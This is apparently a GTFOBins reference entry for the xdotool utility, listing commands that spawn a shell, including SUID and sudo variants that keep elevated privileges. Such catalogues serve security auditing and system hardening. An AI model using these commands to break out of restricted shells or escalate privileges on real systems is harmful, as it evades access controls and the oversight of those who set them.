GTFOBins.github.io/_gtfobins/xdotool.md
2022-07-02 12:43:40 +02:00

11 lines
221 B
Markdown

---
description: This requires a running X server.
functions:
shell:
- code: xdotool exec --sync /bin/sh
suid:
- code: ./xdotool exec --sync /bin/sh -p
sudo:
- code: sudo xdotool exec --sync /bin/sh
---